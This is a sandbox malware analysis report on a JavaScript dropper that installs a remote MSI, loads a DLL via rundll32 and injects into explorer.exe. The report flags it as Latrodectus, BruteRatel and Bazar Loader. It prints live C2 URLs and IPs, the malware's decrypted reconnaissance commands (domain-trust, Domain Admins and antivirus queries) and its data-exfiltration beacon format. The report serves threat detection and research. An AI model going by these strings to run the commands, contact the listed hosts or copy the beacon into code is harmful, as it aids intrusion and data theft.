Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document-18-33-08.js

Overview

General Information

Sample name:Document-18-33-08.js
Analysis ID:1525184
MD5:c05645ed2ec3ff5c541b99d20011a488
SHA1:6822c03f0781ac932c31747610f1fe1039f6861f
SHA256:a9a4640e3887e4ee71ae0e0624afa6b8fa6a22cdffd190f1d83234109dd8496d
Tags:BruteRatelBruteRateljsuser-k3dg3___
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sample has a suspicious name (potential lure to open the executable)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript install MSI file from remote location
Checks for available system drives (often done to infect USB drives)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 984 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • msiexec.exe (PID: 768 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3228 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIF29D.tmp (PID: 1848 cmdline: "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: B9545ED17695A32FACE8C3408A6A3553)
      • rundll32.exe (PID: 2924 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5880 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState MD5: EF3179D498793BF4234F708D3BE28633)
          • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Latrodectus, LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_2Yara detected BruteRatelJoe Security
    00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
      00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
        00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
          00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.rundll32.exe.1ff4b020000.3.raw.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
              6.2.rundll32.exe.1ff4b0a0000.5.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
                6.2.rundll32.exe.1ff4b0a0000.5.raw.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: RunDLL32 Spawning Explorer
                  Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5880, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 1028, ProcessName: explorer.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", ProcessId: 984, ProcessName: wscript.exe
                  Sigma detected: Msiexec Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.119.112.7, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 768, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js", ProcessId: 984, ProcessName: wscript.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T20:44:05.187319+020020487351A Network Trojan was detected192.168.2.550048188.114.96.3443TCP
                  2024-10-03T20:44:08.857690+020020487351A Network Trojan was detected192.168.2.550050188.114.96.3443TCP
                  2024-10-03T20:44:10.117125+020020487351A Network Trojan was detected192.168.2.550051188.114.96.3443TCP
                  2024-10-03T20:44:14.824356+020020487351A Network Trojan was detected192.168.2.550053188.114.96.3443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 8.0.explorer.exe.3050000.0.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
                  Sample uses string decryption to hide its real strings
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c ipconfig /all
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c systeminfo
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c nltest /domain_trusts
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c net view /all
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c nltest /domain_trusts /all_trusts
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c net view /all /domain
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &ipconfig=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c net group "Domain Admins" /domain
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c net config workstation
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /c whoami /groups
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &systeminfo=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &domain_trusts=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &domain_trusts_all=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_view_all_domain=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_view_all=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_group=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &wmic=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_config_ws=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &net_wmic_av=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &whoami_group=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "pid":
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%d",
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "proc":
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%s",
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "subproc": [
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &proclist=[
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "pid":
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%d",
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "proc":
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%s",
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "subproc": [
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &desklinks=[
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: *.*
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "%s"
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Update_%x
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Custom_update
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: .dll
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: .exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Error
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: runnung
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %s/%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: front
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: /files/
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Alpha
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Cookie:
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: POST
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: GET
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: curl/7.88.1
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: CLEARURL
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: URLS
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: COMMAND
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: ERROR
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: [{"data":"
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: "}]
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &dpost=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: https://isomicrotich.com/test/
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: https://opewolumeras.com/test/
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: \*.dll
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: AppData
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Desktop
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Startup
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Personal
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Local AppData
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %s%d.dll
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: <!DOCTYPE
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Content-Length: 0
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: <html>
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Content-Type: application/dns-message
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: Content-Type: application/ocsp-request
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: 12345
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: 12345
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &stiller=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %s%d.exe
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %x%x
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &mac=
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %02x
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: :%02x
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &computername=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: &domain=%s
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: LogonTrigger
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: \Registry\Machine\
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: TimeTrigger
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: PT0H%02dM
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: PT0S
                  Source: 8.0.explorer.exe.3050000.0.unpackString decryptor: \update_data.dat
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50048 version: TLS 1.2
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp, vierm_soft_x64.dll.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpFile opened: c:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FEAF79 FindFirstFileExW,4_2_00FEAF79
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0305A8E0
                  Source: C:\Windows\explorer.exeCode function: 8_2_03052B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_03052B28
                  Source: C:\Windows\explorer.exeCode function: 8_2_030604C0 FindFirstFileW,8_2_030604C0

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50053 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50048 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50050 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50051 -> 188.114.96.3:443
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 82.115.223.39 8041Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 443Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.78.24.30 8041Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://isomicrotich.com/test/
                  Source: Malware configuration extractorURLs: https://opewolumeras.com/test/
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49903
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50020
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50021
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50023
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50024
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50026
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50027
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50032
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50043
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50052
                  Wscript install MSI file from remote location
